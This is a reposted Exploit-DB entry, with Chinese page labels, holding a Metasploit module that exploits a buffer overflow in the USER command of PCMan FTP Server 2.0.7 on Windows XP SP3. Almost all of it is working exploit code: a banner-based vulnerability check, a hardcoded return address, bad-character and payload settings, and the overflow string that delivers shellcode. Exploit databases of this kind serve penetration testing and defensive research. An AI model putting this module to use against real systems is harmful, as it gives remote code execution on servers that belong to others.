PCMan FTP Server 2.0.7 – Remote (Metasploit)

• Exploit Database
• 7 阅读

• 作者： MSJ
  日期： 2013-07-22
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/27007/

• # Exploit-DB Note: Ret needs adjustment for Windows XP SP3 English
  
  ##
  # This file is part of the Metasploit Framework and may be subject to
  # redistribution and commercial restrictions. Please see the Metasploit
  # web site for more information on licensing and terms of use.
  # http://metasploit.com/
  ##
  
  require 'msf/core'
  
  class Metasploit3 < Msf::Exploit::Remote
  	Rank = AverageRanking
  
  	include Msf::Exploit::Remote::Ftp
  
  	def initialize(info = {})
  		super(update_info(info,
  			'Name' => 'PCMan\'s FTPD V2.0.7 Username Overflow',
  			'Description'=> %q{
  					This module exploits a buffer overflow found in the USER command
  				of PCMan's FTPD.
  			},
  			'Author' => 'MSJ <matt.jones.85[at]gmail.com>',
  			'License'=> MSF_LICENSE,
  			'DefaultOptions' =>
  				{
  					'EXITFUNC' => 'thread'
  				},
  			'Payload'=>
  				{
  					'Space'=> 2005,
  					'BadChars' => "\x53\x93\x42\x7E",
  					'StackAdjustment' => -3500,
  				},
  			'Platform' => 'win',
  			'Targets'=>
  				[
  					# Target 0
  					[
  						'Windows XP SP3 English',
  						{
  							'Ret'=> 0x7e429353 # push esp, ret
  						}
  					]
  				],
  			'Default Target' => 0))
  	end
  
  	def check
  		connect
  		disconnect
  
  		if (banner =~ /220 PCMan\'s FTP Server 2\.0 Ready\./)
  			return Exploit::CheckCode::Vulnerable
  		end
  			return Exploit::CheckCode::Safe
  	end
  
  	def exploit
  		connect
  
  		print_status("Trying target #{target.name}...")
  
  		sploit = 'USER ' + "\x41" * 2005 + [target.ret].pack('V') + make_nops(16) + payload.encoded
  		
  		send_cmd( [sploit] , false )
  
  		handler
  		disconnect
  	end
  
  end